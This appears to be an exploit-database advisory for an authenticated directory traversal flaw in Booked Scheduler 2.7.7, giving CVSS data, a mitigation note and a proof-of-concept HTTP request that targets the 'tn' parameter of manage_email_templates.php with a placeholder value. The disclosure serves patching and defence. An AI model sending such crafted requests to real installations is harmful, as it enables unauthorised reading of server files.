Booked Scheduler 2.7.7 - Authenticated Directory Traversal

vendor:

Booked Scheduler

by:

Besim ALTINOK

8.8

CVSS

HIGH

Authenticated Directory Traversal

CWE

Product Name: Booked Scheduler

Affected Version From: 2.7.7

Affected Version To: 2.7.7

Patch Exists: YES

Related CWE: N/A

CPE: a:bookedscheduler:booked_scheduler

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Xampp

2020

Booked Scheduler 2.7.7 – Authenticated Directory Traversal

Booked Scheduler is vulnerable to an authenticated directory traversal vulnerability. This vulnerability allows an authenticated user to access files outside of the web root directory. The vulnerable parameter is $tn, which is located in the manage_email_templates.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the server.

Mitigation:

Booked Scheduler should be updated to the latest version to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Date: 2020-05-03
# Author: Besim ALTINOK
# Vendor Homepage: https://www.bookedscheduler.com
# Software Link: https://sourceforge.net/projects/phpscheduleit/
# Version: v2.7.7
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description:
----------------------------------------------------------
Vulnerable Parameter: $tn
Vulnerable File: manage_email_templates.php


PoC
-----------

GET
/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/booked/Web/admin/manage_email_templates.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec